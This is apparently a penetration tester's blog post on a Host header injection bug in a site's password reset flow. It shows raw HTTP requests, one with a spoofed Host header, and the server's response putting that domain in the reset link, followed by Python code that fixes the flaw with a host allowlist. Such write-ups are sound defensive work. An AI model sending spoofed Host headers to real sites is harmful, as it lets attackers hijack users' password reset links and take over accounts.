Practical example of Host header injection

Let me introduce one of my old findings today. This particular bug was discovered in one of the private sites I worked on.

Before discussing the vulnerability, let us cover some background necessary for the attack.



Very often multiple websites are hosted on the same IP address. This is where the Host header comes in. This header specifies which website should process the HTTP request; the web server uses its value to dispatch the request to the specified website. Each website hosted on the same IP address is called a virtual host. But what happens if we specify an invalid Host header? If Apache receives an unrecognized Host header, it passes the request to the first virtual host defined in httpd.conf. Therefore, it is possible to send requests with arbitrary Host headers to the first virtual host.

The application I pentested (let's call it abc.com) was affected by this kind of vulnerability, which is why, as an attacker, it was possible to send the site's users fake password reset links, with the link destination controlled by the attacker.

When a user of the site starts the password reset procedure, the site presents the page shown in the screenshot below.

The password reset procedure goes like this:
GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1
Host: www.abc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie: redacted
Connection: keep-alive

You can see the highlighted Host header value (www.abc.com), which makes this a valid request to the site.


Let us spoof the header, replacing it with google.com (standing in for an attacker-controlled domain), and send the request:

GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: abc.com
Cookie: redacted
Connection: keep-alive


Now see the response to the spoofed request:

HTTP/1.1 302 Found
Date: xxxxx
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: uclid=0; path=/; domain=.google.com
Location: http://google.com/?743&user_email=victimemail@gmail.com&flag=6&user_type=0
Vary: Accept-Encoding
Content-Length: 37317
Keep-Alive: timeout=2, max=400
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Now see the screenshot of the victim's email, which shows the password reset link pointing at the domain controlled by the attacker.
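The root cause above is an absolute reset URL built from whatever Host header the client sent. The following is an added illustration, not code from the affected site: a Python model of the vulnerable link builder next to a hardened one that validates the Host header against an allowlist and always builds the link from a configured canonical domain. CANONICAL_HOST, ALLOWED_HOSTS and the sample request are constructed for the example.

```python
import re
from urllib.parse import urlencode

# Constructed for this example (not the application's real configuration):
# the canonical domain the site is deployed under and the hosts it serves.
CANONICAL_HOST = "www.abc.com"
ALLOWED_HOSTS = {"www.abc.com", "abc.com"}

# A Host header is a hostname, optionally followed by a port. Anything else
# (spaces, slashes, an empty value) is rejected before the allowlist check.
_HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}(:\d{1,5})?$")


def host_from_request(raw_request: str) -> str:
    """Extract the Host header value from a raw HTTP/1.1 request; "" if absent."""
    for line in raw_request.split("\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            return value.strip()
    return ""


def validate_host(host_header: str) -> bool:
    """True only if the Host header is well formed and one we actually serve."""
    if not _HOST_RE.match(host_header):
        return False
    return host_header.split(":")[0].lower() in ALLOWED_HOSTS


def vulnerable_reset_link(host_header: str, email: str) -> str:
    """The pattern behind the finding: the absolute URL placed in the reset
    mail is built from the request's Host header, so whoever controls that
    header controls where the victim's link points."""
    query = urlencode({"user_email": email, "flag": 6, "user_type": 0})
    return f"http://{host_header}/?743&{query}"


def safe_reset_link(host_header: str, email: str) -> str:
    """Hardened version: reject unrecognised hosts, and build the link from the
    configured canonical host rather than from anything the client sent."""
    if not validate_host(host_header):
        raise ValueError(f"unrecognised Host header: {host_header!r}")
    query = urlencode({"user_email": email, "flag": 6, "user_type": 0})
    return f"http://{CANONICAL_HOST}/?743&{query}"


if __name__ == "__main__":
    # Constructed request mirroring the spoofed one shown in the post.
    spoofed = "GET /?743&user_email=victimemail@gmail.com&flag=2 HTTP/1.1\r\nHost: google.com\r\n\r\n"
    host = host_from_request(spoofed)
    print("vulnerable:", vulnerable_reset_link(host, "victimemail@gmail.com"))
    try:
        print("hardened:", safe_reset_link(host, "victimemail@gmail.com"))
    except ValueError as err:
        print("hardened: rejected,", err)
```

The same allowlist check belongs in the web server too: a default virtual host listed first in httpd.conf that answers unknown Host values with an error keeps the application from ever seeing them.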


 


